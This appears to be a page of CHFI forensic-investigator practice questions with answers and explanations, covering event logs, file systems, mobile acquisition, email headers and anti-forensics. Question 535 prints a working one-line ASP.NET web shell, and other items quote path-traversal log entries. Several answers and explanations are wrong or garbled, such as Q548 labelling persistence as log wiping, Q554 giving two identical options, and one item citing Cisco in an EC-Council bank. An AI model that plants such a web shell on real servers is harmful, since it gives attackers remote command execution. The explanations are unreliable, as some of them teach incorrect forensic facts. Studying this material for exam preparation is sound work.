Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 526600

1000 questions total · 14pages · All types, answers revealed

Page 7

Page 8 of 14

Page 9
526
MCQeasy

A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?

A.The user successfully logged on from a remote workstation
B.A brute-force password attack is occurring against that account
C.The user's account was created
D.A service was installed on the system
AnswerB

Repeated failed logons from a remote IP indicate a brute-force attack.

Why this answer

Event ID 4625 indicates a failed logon attempt. Repeated failures from a remote IP suggest a brute-force password guessing attack.

527
MCQeasy

A first responder arrives at a scene where a computer is powered on and the user is present. According to standard forensic first responder procedures, what should the responder do FIRST?

A.Photograph the scene and document the system state
B.Boot the system from a forensic USB to create a memory dump
C.Immediately disconnect the power cord to preserve the hard drive
D.Ask the user to log out so the system can be powered off safely
AnswerA

Documenting the scene, including the screen contents, connections, and surroundings, is the first critical step.

Why this answer

Option A is correct because the first priority at a live scene is to preserve volatile evidence and establish a chain of custody. Photographing the scene and documenting the system state (e.g., running processes, open network connections, logged-in users) captures critical volatile data before any action is taken. This aligns with the order of volatility (RFC 3227), which mandates capturing memory and system state before altering the system.

Exam trap

The trap here is that candidates confuse the urgency of preserving the hard drive (Option C) with the forensic priority of capturing volatile data first, leading them to pull the plug prematurely.

How to eliminate wrong answers

Option B is wrong because booting from a forensic USB before documenting the scene risks overwriting volatile data (e.g., memory, process lists) and violates the order of volatility; memory dumps should be performed after initial documentation. Option C is wrong because immediately disconnecting power destroys volatile data (RAM, network connections) and can cause file system corruption; a controlled shutdown or live acquisition is preferred. Option D is wrong because asking the user to log out alters the system state (e.g., terminates processes, clears clipboard) and may destroy evidence of user activity; the responder should not involve the user in evidence preservation.

528
MCQeasy

Which file system artifact in NTFS is used to hide data by appending a stream to an existing file without affecting its primary data stream?

A.USN Journal
B.$Recycle.bin
C.Alternate Data Streams (ADS)
D.Master File Table ($MFT)
AnswerC

ADS allows data to be hidden in a separate stream.

Why this answer

Alternate Data Streams (ADS) allow hiding data by attaching additional streams to files. They are not visible in standard directory listings.

529
MCQmedium

A malware analyst uses Cuckoo Sandbox to analyze a sample. The report shows that the sample sends HTTP POST requests to 'http://malicious.example.com/gate.php' with encrypted data. Which type of indicator of compromise (IoC) is this?

A.Host-based IoC
B.Memory-based IoC
C.Hash-based IoC
D.Network-based IoC
AnswerD

The URL and domain are network artifacts indicating C2 communication.

Why this answer

The HTTP POST request to a remote URL with encrypted data is a classic network-based indicator because it involves communication over a network protocol (HTTP) to an external server. Cuckoo Sandbox captures this as a network artifact, making it a network-based IoC (Option D). Host-based IoCs focus on file system or registry changes, memory-based on in-RAM artifacts, and hash-based on file fingerprints.

Exam trap

EC-Council often tests the distinction between host-based and network-based IoCs by presenting a network artifact (like an HTTP request) and expecting candidates to recognize it as network-based, not host-based, even though the malware runs on the host.

How to eliminate wrong answers

Option A is wrong because host-based IoCs refer to artifacts on the local system (e.g., files created, registry keys modified, processes spawned), not outbound network traffic. Option B is wrong because memory-based IoCs involve artifacts found in RAM (e.g., injected code, API hooks, process memory dumps), not network packets. Option C is wrong because hash-based IoCs are cryptographic hashes (e.g., MD5, SHA-1, SHA-256) of files, used to identify known malware samples, not behavioral network patterns.

530
MCQeasy

Which of the following BEST describes Locard's exchange principle as applied to digital forensics?

A.Digital evidence must be collected using a write blocker.
B.The chain of custody must be documented for evidence to be admissible.
C.Volatile data must be collected before powering off a system.
D.Every contact leaves a trace; an attacker will leave digital evidence on the compromised system.
AnswerD

This correctly applies the principle to digital forensics.

Why this answer

Locard's exchange principle states that every contact leaves a trace. In digital forensics, this means that when an attacker interacts with a compromised system, they inevitably leave behind digital artifacts such as log entries, modified files, registry changes, or network connection records. Option D correctly captures this core concept as applied to digital forensics.

Exam trap

The trap here is that candidates confuse procedural best practices (write blockers, chain of custody, order of volatility) with the fundamental theoretical principle of trace evidence exchange, leading them to pick a practical step instead of the conceptual definition.

How to eliminate wrong answers

Option A is wrong because using a write blocker is a best practice for preserving the integrity of digital evidence during acquisition, but it is not a description of Locard's exchange principle. Option B is wrong because documenting the chain of custody is a legal and procedural requirement for evidence admissibility, not a statement of the exchange principle. Option C is wrong because collecting volatile data before powering off is a priority in incident response (order of volatility), but it does not describe the trace-leaving nature of Locard's principle.

531
MCQeasy

During a network forensic investigation, the analyst recovers a PCAP file. What type of information can be directly extracted from this file?

A.Files transferred via HTTP
B.Operating system version of the source host
C.Registry data of the destination host
D.Disk partition table of the sending computer
AnswerA

HTTP file transfers are visible in the payload of packets.

Why this answer

A PCAP file captures raw network packets. HTTP is an application-layer protocol that transmits data (e.g., files, web pages) in cleartext over TCP. By reassembling TCP streams from the captured packets, an analyst can directly extract files transferred via HTTP, as the payload contains the actual file content.

Exam trap

EC-Council often tests the distinction between what is directly extractable from packet payloads (e.g., HTTP files) versus what requires inference or additional forensic artifacts (e.g., OS fingerprinting or disk data), leading candidates to overestimate the information available in a PCAP.

How to eliminate wrong answers

Option B is wrong because the operating system version of the source host is not directly stored in packet headers; it can only be inferred through techniques like TCP/IP fingerprinting (e.g., analyzing TTL values, window sizes), not directly extracted. Option C is wrong because registry data resides on the local disk of the destination host and is never transmitted over the network in standard protocols; a PCAP contains only network traffic, not local filesystem artifacts. Option D is wrong because the disk partition table is a low-level disk structure that is not sent over the network during normal communication; it would require a full disk image, not a packet capture.

532
Matchingmedium

Match each forensic tool to its primary purpose.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Acquisition and preview of disk images

Forensic analysis and evidence processing

Memory forensics and analysis

Network packet capture and analysis

Open-source file system analysis

Why these pairings

These are standard tools used in digital forensics for specific tasks.

533
MCQmedium

Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?

A.Port scanning
B.NetFlow analysis
C.Signature-based detection
D.Deep packet inspection
AnswerB

NetFlow analysis uses flow records to summarize traffic, often used for anomaly detection.

Why this answer

NetFlow analysis examines flow records (e.g., IPFIX, NetFlow) to understand traffic patterns, volumes, and anomalies, using tools like SiLK or nfdump.

534
MCQmedium

An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?

A.7045
B.4624
C.4648
D.4720
AnswerA

Service installation event.

Why this answer

Event ID 7045 indicates a service was installed on the system, which attackers often use to maintain persistence.

535
MCQhard

During a forensic investigation of a compromised web server, you find a file named 'cmd.aspx' in the uploads directory. The file contains: <%@ Page Language="C#" %><% Response.Write(System.Diagnostics.Process.Start("cmd.exe","/c "+Request.QueryString["cmd"])).StandardOutput.ReadToEnd(); %>. What is the most likely purpose of this file?

A.It is a database connection string
B.It is a legitimate ASP.NET application page for server management
C.It is a webshell used for remote command execution
D.It is a cross-site scripting payload
AnswerC

The code runs cmd.exe with user-supplied commands, characteristic of a webshell.

Why this answer

This is a webshell that executes arbitrary operating system commands via the 'cmd' query parameter. It allows remote command execution on the server.

536
MCQhard

In a Docker container forensics investigation, an analyst needs to examine the file system of a stopped container to look for malicious artifacts. Which command should the analyst run to create a recoverable snapshot of the container's file system without starting the container?

A.docker cp <container_id>:/path /host/path
B.docker export <container_id> -o output.tar
C.docker save <image_id> -o output.tar
D.docker commit <container_id>
AnswerB

docker export exports the container's file system as a tar archive, suitable for offline analysis, without starting the container.

Why this answer

docker export captures the file system of a stopped container as a tar archive for forensic analysis.

537
MCQhard

In an email header, an analyst notices the following: 'Received: from mail.attacker.com (192.168.2.100) by mail.victim.com (Postfix) with ESMTP id ABC123 for <user@victim.com>; ...'. The 'From' address appears as 'ceo@victim.com'. Which type of attack is most likely?

A.Man-in-the-middle
B.Email spoofing
C.Malware attachment
D.Phishing
AnswerB

The mismatch between the From domain and the originating server indicates spoofing.

Why this answer

The email claims to be from 'ceo@victim.com' but was received from 'mail.attacker.com', indicating the sender forged the From address. This is email spoofing.

538
MCQeasy

An email forensic analyst receives a suspicious email and examines the full headers. Which header field is the MOST reliable for determining the true originating IP address of the sender, assuming no spoofing of the header?

A.Return-Path
B.Received
C.Message-ID
D.From
AnswerB

Each mail server adds its own Received header; the bottommost Received header (the first one added) typically shows the originating IP.

Why this answer

The Received headers are added by each SMTP server; the first Received header (bottommost) contains the IP of the originating server.

539
MCQhard

A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?

A.A USB network adapter was attached
B.A USB storage device was attached
C.A USB printer was attached
D.A USB keyboard was attached
AnswerB

USBSTOR (USB Storage) records storage devices like flash drives.

Why this answer

The USBSTOR registry key records the serial numbers of USB storage devices that have been connected to the system. Its presence indicates a USB device was attached.

540
MCQmedium

During a forensic investigation, you need to acquire the RAM of a running Linux system. Which tool is specifically designed for memory acquisition on Linux?

A.Memdump
B.Volatility
C.WinPmem
D.LiME
AnswerD

LiME is the recommended tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that allows full system memory acquisition from Linux systems. It is the standard tool for Linux memory forensics.

541
MCQeasy

During a mobile forensics investigation, an examiner needs to acquire data from an iPhone running iOS 14. Which of the following acquisition methods provides the MOST complete data extraction?

A.File system acquisition via jailbreak
B.Manual acquisition by browsing the device
C.Physical acquisition via JTAG or chip-off
D.Logical acquisition via iTunes backup
AnswerC

Physical acquisition provides a complete bit-for-bit copy of the storage, including deleted and hidden data.

Why this answer

Physical acquisition via JTAG or chip-off provides the most complete data extraction because it captures a bit-for-bit copy of the raw NAND flash memory, including deleted files, unallocated space, and system partitions that are otherwise inaccessible. On iOS 14, Apple's security features (e.g., full-disk encryption, SEP) limit logical and file system methods, but physical techniques bypass the operating system to retrieve the entire storage image, albeit with decryption challenges.

Exam trap

EC-Council often tests the misconception that jailbreak-based file system acquisition is the most complete method, but physical acquisition (JTAG/chip-off) is technically superior because it captures the entire raw storage, including areas the OS hides or encrypts.

How to eliminate wrong answers

Option A is wrong because jailbreaking iOS 14 is often not possible or reliable due to Apple's hardened security (e.g., KTRR, PAC), and even if achieved, file system acquisition still cannot access the raw physical memory or unallocated space, leaving gaps in data recovery. Option B is wrong because manual acquisition only captures visible data through the user interface, missing hidden files, metadata, and deleted content, making it the least complete method. Option D is wrong because logical acquisition via iTunes backup only retrieves files that iOS chooses to include in the backup (e.g., app data, settings), excluding system files, deleted data, and unallocated space, and it relies on the backup encryption state.

542
MCQmedium

Which of the following is a key requirement for digital evidence to be considered admissible in court?

A.The evidence must be authentic and its integrity must be verifiable
B.The evidence must have been collected by a law enforcement officer
C.The evidence must be stored on a write-blocked device
D.The evidence must be encrypted to ensure confidentiality
AnswerA

Authenticity and integrity are fundamental to admissibility.

Why this answer

Digital evidence must be authentic and its integrity verifiable to meet the legal standard of admissibility, as established by rules such as the Federal Rules of Evidence (FRE 901) and the Daubert standard. Authentication requires proving that the evidence is what it claims to be, typically through a hash value (e.g., MD5, SHA-1, or SHA-256) computed before and after analysis to ensure no tampering occurred. Without verifiable integrity, the evidence could be challenged as altered, making it inadmissible regardless of how it was collected.

Exam trap

EC-Council often tests the misconception that procedural steps like write-blocking or law enforcement involvement are legal requirements, when in fact the core admissibility criterion is the ability to prove authenticity and integrity through verifiable means like hash values and chain of custody documentation.

How to eliminate wrong answers

Option B is wrong because digital evidence can be collected by any qualified forensic examiner, not exclusively a law enforcement officer; private-sector investigators or certified forensic analysts often handle evidence in civil cases. Option C is wrong because while write-blocking is a best practice to preserve evidence integrity, it is not a legal requirement for admissibility; evidence stored on a non-write-blocked device may still be admissible if integrity is otherwise proven (e.g., via hash verification). Option D is wrong because encryption is not a requirement for admissibility; in fact, encrypted evidence may be inadmissible if the decryption key is unavailable or if encryption obscures the evidence's authenticity, and confidentiality is separate from the legal standards of authenticity and integrity.

543
MCQhard

An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?

A./proc/1234/status
B./proc/1234/maps
C./proc/1234/cmdline
D./proc/1234/fd
AnswerC

cmdline contains the command line arguments of the process, separated by null bytes.

Why this answer

The /proc/[pid]/cmdline file contains the full command line of the process, and /proc/[pid]/environ contains environment variables. The question asks for both, but cmdline is specifically for command line. However, for both, cmdline is primary.

544
MCQeasy

In Android forensics, which command is used to extract a full physical image of a device's flash memory over USB using the Android Debug Bridge (ADB)?

A.adb pull /data data.img
B.adb shell dd if=/dev/block/mmcblk0 of=/sdcard/physical.img
C.adb backup -f backup.ab
D.adb install physical.img
AnswerB

dd copies the raw block device to a file, creating a physical image.

Why this answer

Option B is correct because the `adb shell dd if=/dev/block/mmcblk0 of=/sdcard/physical.img` command uses the `dd` utility to perform a bit-for-bit copy of the raw block device representing the internal flash memory (mmcblk0) to a file on the device's SD card, which can then be pulled via ADB. This method captures a full physical image, including deleted data and unallocated space, which is essential for deep forensic analysis.

Exam trap

Cisco often tests the distinction between logical acquisition (adb pull) and physical acquisition (adb shell dd), so the trap here is that candidates confuse the simple file copy command (adb pull) with the raw block-level imaging command (adb shell dd), assuming any command with 'pull' or 'backup' can produce a forensic image.

How to eliminate wrong answers

Option A is wrong because `adb pull /data data.img` only copies the logical contents of the /data partition, not a raw block-level image, and thus misses deleted files, unallocated space, and metadata from other partitions. Option C is wrong because `adb backup -f backup.ab` creates a logical backup of app data and system settings, not a physical image of flash memory; it does not capture the raw block device or unallocated space. Option D is wrong because `adb install physical.img` is used to install an APK file, not to extract an image; attempting to install a raw image file would fail or corrupt the device.

545
Multi-Selecthard

Which THREE of the following are characteristics of the GPT (GUID Partition Table) compared to MBR?

Select 3 answers
A.Partition information is stored in the boot code area
B.Uses a 32-bit Logical Block Address (LBA)
C.Partitions are identified by a Globally Unique Identifier (GUID)
D.Supports up to 128 primary partitions
E.Stores a backup partition table at the end of the disk
AnswersC, D, E

Each partition has a GUID.

Why this answer

GPT uses GUIDs, supports up to 128 partitions, stores a backup partition table at the end, and uses 64-bit LBA. It does not store partitions in the boot code area.

546
MCQeasy

Locard's exchange principle is fundamental to forensic science. How does this principle apply to computer forensics?

A.Every action on a digital device leaves some trace of evidence.
B.Digital evidence is always volatile and must be preserved immediately.
C.Evidence must be collected within 24 hours.
D.Only physical evidence, such as fingerprints, can be left at a crime scene.
AnswerA

Logs, metadata, artifacts are all traces of activity.

Why this answer

Locard's principle states that every contact leaves a trace; in digital forensics, this translates to digital traces left behind when a system is accessed.

547
MCQmedium

An analyst is investigating a data exfiltration incident. The MySQL transaction logs show a series of unusual SELECT queries retrieving large amounts of data from the 'customers' table, executed by a user account 'webapp'. What should the analyst check NEXT to determine if the data was actually exfiltrated?

A.Review the web server access logs for requests to external IPs containing the queried data
B.Examine the database schema for unauthorized stored procedures
C.Analyze the MySQL audit logs for privilege escalation attempts
D.Check the MySQL binary logs for any DELETE or DROP statements
AnswerA

Web server logs may show HTTP requests exfiltrating data, providing evidence of actual transfer.

Why this answer

After identifying suspicious queries, the analyst should check the application server logs to see if the results were sent externally.

548
MCQmedium

During dynamic analysis of a malware sample in Any.run, an analyst observes that the malware writes a value to HKCU\Software\Microsoft\Windows\CurrentVersion\Run and also creates a scheduled task named 'UpdateTask'. Which anti-forensic technique is the malware MOST likely attempting to counter?

A.Packing
B.Encryption
C.Timestomping
D.Log wiping
AnswerD

Creating persistence and then cleaning up traces is a form of log wiping to hide its presence.

Why this answer

Persistence mechanisms like Run keys and scheduled tasks are often monitored by security tools. If malware attempts to delete or modify these after execution, it is trying to remove evidence of persistence, which is a form of log wiping or anti-forensics.

549
MCQmedium

A cloud forensic investigator is examining AWS CloudTrail logs for signs of unauthorized access to an S3 bucket. Which of the following CloudTrail event names would indicate a successful attempt to list the objects in the bucket?

A.GetObject
B.PutObject
C.DeleteObject
D.ListObjects
AnswerD

ListObjects is the API call to list objects in a bucket.

Why this answer

The ListObjects operation lists the objects in an S3 bucket; the CloudTrail event name is 'ListObjects'.

550
MCQhard

During a forensic investigation of a Windows 10 system, you find that a suspect used the 'cipher /w:C:' command. What is the primary forensic implication of this action?

A.It encrypts all files on the C: drive
B.It wipes free space, hindering recovery of deleted files
C.It enables file system journaling
D.It removes alternate data streams from files
AnswerB

cipher /w overwrites free space to prevent recovery of deleted data.

Why this answer

The `cipher /w:C:` command overwrites free space on the C: drive with zeros, making deleted file recovery from unallocated space much more difficult.

551
MCQeasy

An analyst is investigating a compromised Linux system. Which file system structure holds metadata about every file and directory, including permissions, ownership, timestamps, and pointers to data blocks?

A.Journal
B.Block bitmap
C.Superblock
D.Inode
AnswerD

Each file and directory has an inode containing metadata and pointers to data blocks.

Why this answer

Inodes are data structures in ext2/3/4 that store metadata about files and directories.

552
MCQmedium

An IIS log entry shows: `2024-07-15 14:22:10 10.0.0.5 GET /../../windows/system32/cmd.exe 404 - Mozilla/5.0`. What attack technique does this log entry indicate?

A.Remote code execution (RCE)
B.Directory traversal
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB

The ../ sequences are used to traverse directories and access cmd.exe, a classic path traversal attempt.

Why this answer

The presence of '../' sequences in the URI path indicates a path traversal attack attempting to access files outside the web root.

553
MCQmedium

A security analyst finds the following entry in the Apache access log: 10.0.0.5 - - [20/Jan/2023:08:12:44 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 345 "-" "curl/7.68.0". Which attack was attempted?

A.Remote File Inclusion
B.Path Traversal
C.Command Injection
D.Cross-Site Request Forgery (CSRF)
AnswerB

The '../' sequences are used to navigate directories outside the web root to access sensitive files.

Why this answer

The URI contains '../../../../etc/passwd', which is a path traversal attempt to read the /etc/passwd file. The 404 status indicates the file was not found, but the intent is clear.

554
MCQhard

During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 02:15:30 server sshd[1234]: Failed password for root from 10.0.0.5 port 54321 ssh2'. Which command would you use to extract all failed root login attempts from this log?

A.awk '/Failed password for root/' /var/log/auth.log
B.grep 'Failed password for root' /var/log/auth.log
C.grep 'Failed password for root' /var/log/auth.log
D.grep 'invalid.*root' /var/log/auth.log
AnswerB

This command extracts all lines containing 'Failed password for root', which matches the failed root login attempts.

Why this answer

The grep command can filter lines containing 'Failed password for root' from the auth.log file. The -i flag is unnecessary as the log is case-sensitive but not needed here.

555
MCQhard

An investigator is analyzing a RAID 5 array consisting of three disks. One disk fails and is replaced. After rebuilding, the file system appears corrupted. What is the MOST likely cause?

A.Two disks failed simultaneously
B.The replacement disk is smaller than the original
C.The file system is not supported by the RAID controller
D.The array was configured with an incorrect stripe size
AnswerB

RAID 5 requires all disks to be the same size; a smaller disk can cause rebuild errors.

Why this answer

RAID 5 can tolerate one disk failure. If the replacement disk is smaller than the original, the rebuild may fail or cause corruption.

556
Drag & Dropmedium

Drag and drop the steps to perform a forensic analysis of a USB drive to identify the connected computer using Windows artifacts into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

USB forensics involves registry keys, device logs, and correlation with event logs.

557
MCQhard

A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?

A.A man‑in‑the‑middle attack
B.A denial‑of‑service (SYN flood) attack
C.A normal HTTPS session initiation
D.A TCP SYN scan (stealth scan)
AnswerD

Correct. The RST after SYN‑ACK is characteristic of a SYN scan.

Why this answer

A SYN followed by SYN‑ACK and then RST is typical of a port scan where the scanner sends a SYN, receives a SYN‑ACK (port open), and then immediately resets the connection to avoid completing the handshake.

558
MCQhard

During a forensic examination of a Windows system infected with ransomware, the analyst finds that the file timestamps (creation, modification, access) for several critical system files have been altered to match legitimate Windows files. Which anti-forensic technique is MOST likely being used?

A.Data hiding via ADS
B.Steganography
C.Log wiping
D.Timestomping
AnswerD

Timestomping modifies file timestamps to evade forensic analysis.

Why this answer

Timestomping is the deliberate alteration of file timestamps (creation, modification, access) to mislead forensic investigators. In this scenario, the ransomware modified critical system file timestamps to match legitimate Windows files, which is the hallmark of timestomping. This technique is commonly used to evade timeline analysis and hide the true sequence of malicious activity.

Exam trap

EC-Council often tests the distinction between timestomping (altering file timestamps) and log wiping (removing event logs), so the trap here is that candidates may confuse 'log wiping' with any timestamp-related manipulation, but log wiping specifically targets event logs, not file metadata.

How to eliminate wrong answers

Option A is wrong because data hiding via Alternate Data Streams (ADS) conceals data within NTFS file streams without altering timestamps, not by modifying them to match legitimate files. Option B is wrong because steganography hides data within other files (e.g., images or audio) and does not involve changing file timestamps. Option C is wrong because log wiping targets system or application logs to remove evidence, not file metadata timestamps on the filesystem.

559
Multi-Selectmedium

An email investigation reveals that a phishing email was sent from a domain that uses DKIM and SPF. The email headers contain: 'DKIM-Signature: v=1; a=rsa-sha256; d=example.com; s=selector1; bh=...; h=...; b=...' and 'Received-SPF: pass (example.com: domain of sender@example.com designates 203.0.113.5 as permitted sender)'. Which TWO conclusions can be drawn?

Select 2 answers
A.The email is definitely legitimate and not spoofed
B.The email's DKIM signature is valid
C.The email was sent from a compromised account
D.The email originated from a different domain
E.The sending server (203.0.113.5) is authorized by the domain's SPF record
AnswersB, E

A valid DKIM signature is present.

Why this answer

SPF pass indicates the sending IP is authorized; DKIM signature validates the email was signed by the domain. Combined, the email is likely not spoofed.

560
MCQhard

An analyst finds the following entry in an IIS access log: 10.0.0.5, -, 10/10/2023, 14:30:22, W3SVC1, WEB01, 192.168.1.100, 80, GET, /login.aspx, 200, 0, 1234, 567, Mozilla/5.0+. Based on the log format, which field contains the HTTP status code?

A.200
B.GET
C.80
D.0
AnswerA

The status code is typically placed after the URI stem.

Why this answer

IIS W3C Extended Log Format includes fields: date, time, client IP, cs-uri-stem, sc-status. In the given entry, the status code 200 appears after the URI and before the 0 (sc-substatus).

561
MCQeasy

An Android phone is found at a crime scene. The phone is locked with a PIN. The forensic examiner wants to extract data without bypassing the lock. Which of the following is the MOST appropriate logical acquisition method?

A.Use Cellebrite UFED to perform a file system extraction
B.Perform a physical acquisition via JTAG
C.Perform an ADB backup
D.Use ADB to pull /data/data/ directory
AnswerC

ADB backup can extract user app data if USB debugging was enabled before locking; it does not require root.

Why this answer

ADB backup (option C) is the most appropriate logical acquisition method for a locked Android phone because it uses the Android Backup protocol over ADB, which can extract application data without needing to bypass the lock screen, provided USB debugging is enabled and the device authorizes the backup. This method does not require root access or physical disassembly, making it a non-invasive logical acquisition technique.

Exam trap

EC-Council often tests the misconception that ADB pull can access /data/data/ on a locked device, but in reality, ADB pull requires root or an unlocked device, while ADB backup is a distinct protocol that can extract data without bypassing the lock screen under specific conditions.

How to eliminate wrong answers

Option A is wrong because Cellebrite UFED's file system extraction typically requires the device to be unlocked or uses exploits to bypass the lock, which contradicts the requirement of not bypassing the lock. Option B is wrong because JTAG is a physical acquisition method that involves hardware-level access and often requires disassembly or bypassing the lock, not a logical acquisition method. Option D is wrong because ADB pull of /data/data/ directory requires root access or an unlocked device to read protected app data, and on a locked phone without root, ADB cannot access that directory.

562
MCQmedium

A forensic investigator needs to collect evidence from a Google Cloud Platform (GCP) environment. Which of the following GCP services provides audit logs for administrative activities and data access?

A.Cloud Storage logs
B.Cloud Monitoring
C.Cloud IAM
D.Cloud Audit Logs
AnswerD

Cloud Audit Logs capture who did what, where, and when.

Why this answer

Cloud Audit Logs in GCP record administrative activities (Admin Activity logs) and data access (Data Access logs) for GCP resources.

563
MCQmedium

In an ext4 file system, after a file is deleted, the inode's di_mode field is set to 0 and the block pointers are cleared. However, the file content may still be recoverable until what happens?

A.The data blocks are overwritten by new files
B.The file system is unmounted
C.The superblock is updated
D.The journal is committed
AnswerA

Once the blocks are reassigned and overwritten, recovery becomes difficult.

Why this answer

In ext4, when a file is deleted, its inode is marked as free, and data blocks are added to the free block bitmap. Recovery is possible if the blocks have not been reused.

564
MCQeasy

During a mobile forensics investigation, an analyst needs to acquire data from an iPhone that cannot be bypassed via passcode. The device is locked, and the analyst has the passcode. Which acquisition method provides the MOST comprehensive data extraction?

A.Physical acquisition
B.Manual acquisition
C.Logical acquisition
D.File system acquisition
AnswerA

Physical acquisition creates a full image of the device's storage, retrieving all data including deleted files.

Why this answer

Physical acquisition is the most comprehensive method because it creates a bit-for-bit copy of the entire flash storage, including the operating system, kernel, unallocated space, and deleted file remnants. Even with the passcode known, a locked iPhone restricts file system access via USB, but physical acquisition (often using advanced techniques like JTAG or chip-off) bypasses these restrictions to extract the raw NAND data, yielding the fullest forensic picture.

Exam trap

EC-Council often tests the misconception that 'logical acquisition' or 'file system acquisition' is sufficient for locked devices, but the trap is that even with the passcode, a locked iPhone restricts file system access via USB, making physical acquisition the only method that can bypass these restrictions and capture the full storage image.

How to eliminate wrong answers

Option B (Manual acquisition) is wrong because it relies on visually navigating the device and photographing or recording the screen, which only captures visible data and cannot extract deleted files, system files, or data from locked partitions. Option C (Logical acquisition) is wrong because it only retrieves files accessible through the operating system's APIs (e.g., via iTunes backup or libimobiledevice), missing unallocated space, deleted data, and system-level artifacts. Option D (File system acquisition) is wrong because, while it provides more data than logical acquisition by accessing the file system hierarchy, it still requires the device to be unlocked and cannot capture raw NAND blocks, unallocated space, or data from protected areas like the kernel cache.

565
Multi-Selecthard

Which THREE of the following are considered types of evidence under the rules of evidence? (Choose three.)

Select 3 answers
A.Corroborating evidence
B.Best evidence
C.Circumstantial evidence
D.Direct evidence
E.Hearsay evidence
AnswersC, D, E

Evidence that implies a fact but does not directly prove it.

Why this answer

Circumstantial evidence is a recognized type of evidence under the rules of evidence because it relies on an inference to connect a fact to a conclusion, rather than directly proving the fact. In digital forensics, circumstantial evidence might include log entries showing a user logged in at the time of an incident, which indirectly suggests involvement. It is admissible as long as the chain of inferences is reasonable and supported by other facts.

Exam trap

EC-Council often tests the distinction between 'types of evidence' and 'rules governing evidence'—candidates confuse the best evidence rule (a procedural rule) with a type of evidence, leading them to incorrectly select 'Best evidence' as a type.

566
MCQeasy

A forensic analyst is examining a FAT32 file system and finds that the file allocation table indicates a cluster chain ending with 0x0FFFFFFF. What does this value signify?

A.End-of-file marker
B.Free cluster
C.Reserved cluster
D.Bad cluster
AnswerA

0x0FFFFFFF is the end-of-cluster-chain marker.

Why this answer

In FAT32 file systems, the File Allocation Table (FAT) uses 32-bit entries to track cluster allocation. The value 0x0FFFFFFF is the defined end-of-file (EOF) marker, indicating that the current cluster is the last in a file's cluster chain. This is a standard FAT32 convention, distinct from other special values like free or bad clusters.

Exam trap

The trap here is confusing the FAT32 EOF marker (0x0FFFFFFF) with the bad cluster marker (0x0FFFFFF7) or the reserved cluster range (0x0FFFFFF0–0x0FFFFFF6), as EC-Council often tests the exact hex values to catch candidates who memorize concepts without the precise numbers.

How to eliminate wrong answers

Option B is wrong because a free cluster is represented by the value 0x00000000 in FAT32, not 0x0FFFFFFF. Option C is wrong because reserved clusters are indicated by values in the range 0x0FFFFFF0 through 0x0FFFFFF6, not 0x0FFFFFFF. Option D is wrong because a bad cluster is marked with the value 0x0FFFFFF7 in FAT32, which is a specific sentinel for physical media defects.

567
MCQhard

In an ext3 file system, after deleting a file, the inode's link count drops to 0, but the data blocks remain. Which of the following is true regarding recovery?

A.The file can be recovered by reading the journal and replaying the deletion transaction
B.The file may be recovered through file carving by searching for known file signatures in the data blocks
C.The file cannot be recovered because ext3 zeroes the inode on deletion
D.The file can be recovered by undeleting the inode using debugfs or extundelete
AnswerB

Since data blocks are not overwritten immediately, file carving can recover the file by finding its header/footer signatures.

Why this answer

In ext3, deleting a file clears the inode and data block pointers. Recovery requires scanning the raw disk for file signatures (file carving) because the inode no longer points to the data.

568
Multi-Selecthard

Which THREE of the following are acceptable best practices when acquiring evidence from a mobile device? (Choose three.)

Select 3 answers
A.Document the SIM card information
B.Capture a logical image of the device if it is unlocked
C.Power off the device immediately to preserve battery
D.Place the device in a Faraday bag to prevent remote wiping
E.Only perform a physical acquisition, as it is the only forensically sound method
AnswersA, B, D

SIM card contains subscriber information.

Why this answer

Option A is correct because documenting the SIM card information, such as the ICCID (Integrated Circuit Card Identifier) and IMSI (International Mobile Subscriber Identity), is a critical step in establishing chain of custody and preserving evidence that may link the device to a specific subscriber or network. This documentation must occur before any acquisition to ensure the SIM's data is not altered by subsequent imaging or isolation procedures.

Exam trap

EC-Council often tests the misconception that powering off a device is always safe for preservation, when in fact it can trigger encryption and destroy volatile evidence, and that physical acquisition is the only valid forensic method, ignoring the forensic validity of logical acquisitions on unlocked devices.

569
Multi-Selectmedium

Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)

Select 2 answers
A.Nmap
B.The Sleuth Kit (mactime)
C.Autopsy
D.Plaso
E.Wireshark
AnswersB, D

The Sleuth Kit includes mactime for creating timelines from disk images.

Why this answer

Plaso (log2timeline) and The Sleuth Kit (with mactime) are both used to create super timelines from file system metadata.

570
Multi-Selecthard

Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)

Select 3 answers
A.LNK files
B.Registry Run keys
C.Service installations
D.Prefetch files
E.Scheduled tasks
AnswersB, C, E

Common persistence via auto-start programs.

Why this answer

Registry Run keys, scheduled tasks, and service installations are common persistence mechanisms. Prefetch files and LNK files are forensic artifacts but not persistence mechanisms.

571
MCQmedium

A forensic investigator finds a suspicious file named `cmd.aspx` in the web root of a compromised IIS server. The file contains code that accepts command input via HTTP GET parameters and executes it on the server. What is the MOST likely classification of this file?

A.Trojan horse
B.Cross-site scripting (XSS) exploit
C.SQL injection payload
D.Web shell
AnswerD

A web shell allows remote command execution via HTTP requests, fitting the description.

Why this answer

A file that accepts commands via HTTP and executes them on the server is a web shell. ASPX is a common extension for .NET web shells.

572
MCQmedium

During an investigation, a forensic analyst must preserve a hard drive that is part of a RAID array. Which of the following is the MOST appropriate method to preserve the evidence?

